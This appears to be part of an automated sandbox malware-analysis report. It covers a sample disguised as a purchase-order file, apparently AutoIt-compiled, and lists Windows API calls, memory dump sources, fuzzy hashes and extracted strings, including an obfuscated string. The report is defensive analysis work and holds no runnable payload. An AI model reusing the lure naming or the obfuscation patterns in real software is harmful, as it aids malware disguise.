                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                                                                                                      • Opcode ID: 3581649c7171f8e12fd73d59a0377c3b1bab844ebbdadb8757991bc42abdba2f
                                                                                                                                                                                                      • Instruction ID: 6fd286384aed1c985e01992562759e80b587d685e8a57b14d478fdb94f0a8a73
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3581649c7171f8e12fd73d59a0377c3b1bab844ebbdadb8757991bc42abdba2f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36B16E71608301AFD704DF65C948B5ABBE5FF88314F00892EF599AB291E774EC05CB9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00446CFB
                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00446D21
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00446D4F
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00446D5A
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00446D70
                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 00446D7B
                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00446D97
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00446DE0
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00446DE7
                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00446E12
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                      • API String ID: 699586101-1459072770
                                                                                                                                                                                                      • Opcode ID: 05c7683b58927b3b4756cbfe02632f1bbbf1e7c5ff07af17dccf1b8176674ae6
                                                                                                                                                                                                      • Instruction ID: c65ea2cb437959043e01196925574286d70b4e00aee65ea3b02482d26ec9895d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05c7683b58927b3b4756cbfe02632f1bbbf1e7c5ff07af17dccf1b8176674ae6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E941F771A04210BBEB04AB66DC47EBF77BCDF51714F10006FF901A2192EA7C9A0596AE
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0041A939
                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 0041A941
                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0041A96C
                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 0041A974
                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 0041A999
                                                                                                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0041A9B6
                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0041A9C6
                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0041A9F9
                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0041AA0D
                                                                                                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 0041AA2B
                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 0041AA47
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0041AA52
                                                                                                                                                                                                        • Part of subcall function 0041B63C: GetCursorPos.USER32(000000FF), ref: 0041B64F
                                                                                                                                                                                                        • Part of subcall function 0041B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0041B66C
                                                                                                                                                                                                        • Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000001), ref: 0041B691
                                                                                                                                                                                                        • Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000002), ref: 0041B69F
                                                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,0041AB87), ref: 0041AA79
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • qw681qqw621qqw6e1qqw601qqw601qqw601qqw601qqw601qqw601qqw661qqw661qqw681qqw691qqw681qqw651qqw641qqw6e1qqw6f1qqw6f1qqw6f1qqw6f1qqw6f, xrefs: 0047DA91
                                                                                                                                                                                                      • AutoIt v3 GUI, xrefs: 0041A9F1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                      • String ID: AutoIt v3 GUI$qw681qqw621qqw6e1qqw601qqw601qqw601qqw601qqw601qqw601qqw661qqw661qqw681qqw691qqw681qqw651qqw641qqw6e1qqw6f1qqw6f1qqw6f1qqw6f1qqw6f
                                                                                                                                                                                                      • API String ID: 1458621304-3099088099
                                                                                                                                                                                                      • Opcode ID: 7bd38733b2008d28acd780992e3c3245ca1dd336451a6bc20c2b3c87aba28f3f
                                                                                                                                                                                                      • Instruction ID: 772b70500764f947b2549a3380184186526abbf3af67c980f925d5c2611f14e1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bd38733b2008d28acd780992e3c3245ca1dd336451a6bc20c2b3c87aba28f3f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31B14F71A0120A9FDB14DFA8DC45BEE7BB4FF08314F11422AFA15A62E0D7789891CB59
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00463735
                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0049DC00,00000000,?,00000000,?,?), ref: 004637A3
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004637EB
                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00463874
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00463B94
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00463BA1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                                                                                                      • Opcode ID: cb9e944771819dfb77be2f049b4f10ecd3768c88c39b614e18d19627da589ee7
                                                                                                                                                                                                      • Instruction ID: 94f16537412128840b1b23fcea22bb683396cf897e5eede4ab9d45138d76c91a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb9e944771819dfb77be2f049b4f10ecd3768c88c39b614e18d19627da589ee7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8026F756006019FCB14DF25C851A1EB7E5FF88714F04846EF9899B3A2DB38ED41CB8A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00466C56
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00466D16
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                      • API String ID: 3974292440-719923060
                                                                                                                                                                                                      • Opcode ID: 25827ff6fd62e69c30516841602535ae5e4ea737b77c996f837d4cff45305b23
                                                                                                                                                                                                      • Instruction ID: efac7140647597b4e0a4d800608fbc95c45418c52914f72453b713750b31682f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25827ff6fd62e69c30516841602535ae5e4ea737b77c996f837d4cff45305b23
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80A1A7742042419FCB14EF25C951A6BB3A5FF84318F11496FB856673D2EB38EC06CB9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0043CF91
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0043D032
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0043D045
                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0043D09A
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0043D0D6
                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0043D10D
                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0043D15F
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0043D195
                                                                                                                                                                                                      • GetParent.USER32(?), ref: 0043D1B3
                                                                                                                                                                                                      • ScreenToClient.USER32(00000000), ref: 0043D1BA
                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0043D234
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0043D248
                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0043D26E
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0043D282
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                                                                                      • String ID: %s%u
                                                                                                                                                                                                      • API String ID: 3119225716-679674701
                                                                                                                                                                                                      • Opcode ID: caa1280b66be122eee60294c142b2acf7174f897f405c9ec7d004c1445a7f129
                                                                                                                                                                                                      • Instruction ID: 24840aa67b1d37cee4f9ed2b757ca5224d0e7bcabf0401134b637d571f0a2458
                                                                                                                                                                                                      • Opcode Fuzzy Hash: caa1280b66be122eee60294c142b2acf7174f897f405c9ec7d004c1445a7f129
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6A1E271A04306AFD714DF64E884FABB7A8FF48354F00492BF95993290DB38EA45CB95
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0043D8EB
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0043D8FC
                                                                                                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0043D924
                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0043D941
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0043D95F
                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 0043D970
                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0043D9A8
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0043D9B8
                                                                                                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0043D9DF
                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0043DA28
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0043DA38
                                                                                                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0043DA60
                                                                                                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 0043DAC9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                                                                                                      • Opcode ID: f5bafd9e4133a9b11a7385cc68cb9402e281c55fc279b59a9e2d3db0b436475a
                                                                                                                                                                                                      • Instruction ID: eb4b748b181ce7837a0a3d84f11938d7b11684f0c71fda1ffb2743c464e57e2d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5bafd9e4133a9b11a7385cc68cb9402e281c55fc279b59a9e2d3db0b436475a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9681D2714083059BDB04DF10E981FAB7BA8EF48308F04546FFD899A196DB38ED45CBA9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                                                                                                      • Opcode ID: d72ac36c6838073e3be21c9fe6d51c1cff5482bf710ef53d0e759e872d46c576
                                                                                                                                                                                                      • Instruction ID: 668cfd7b102cdb3b06fc8f50abdc480de79f1751c551137aa4085a6d09ebe7cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d72ac36c6838073e3be21c9fe6d51c1cff5482bf710ef53d0e759e872d46c576
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4318F31A44205A6DA18FA61EE53FEE73749F24708F70012FF412710D1EFADBA14866D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 0043EAB0
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0043EAC2
                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0043EAD9
                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0043EAEE
                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0043EAF4
                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0043EB04
                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0043EB0A
                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0043EB2B
                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0043EB45
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0043EB4E
                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0043EBB9
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0043EBBF
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0043EBC6
                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0043EC12
                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0043EC1F
                                                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0043EC44
                                                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0043EC6F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3869813825-0
                                                                                                                                                                                                      • Opcode ID: 2ee3f3f24463f46bb3e0f190fbf58a7f298feff8747d48830cd82ce27d0a8a87
                                                                                                                                                                                                      • Instruction ID: 76431d1e8bf3edbe85f4478968f4af4cc14dd66677a52f7337c03f4cbddb23bd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ee3f3f24463f46bb3e0f190fbf58a7f298feff8747d48830cd82ce27d0a8a87
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21514C71901709AFDB21EFA9CD85E6EBBB5FF08704F00492DE586A26E0D774A905CB14
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0040C8B7,?,00002000,?,?,00000000,?,0040419E,?,?,?,0049DC00), ref: 0041E984
                                                                                                                                                                                                        • Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F
                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 0040C93E
                                                                                                                                                                                                        • Part of subcall function 00421DFC: __wsplitpath_helper.LIBCMT ref: 00421E3C
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0040C953
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0040C968
                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0040C978
                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0040CABE
                                                                                                                                                                                                        • Part of subcall function 0040B337: _wcscpy.LIBCMT ref: 0040B36F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
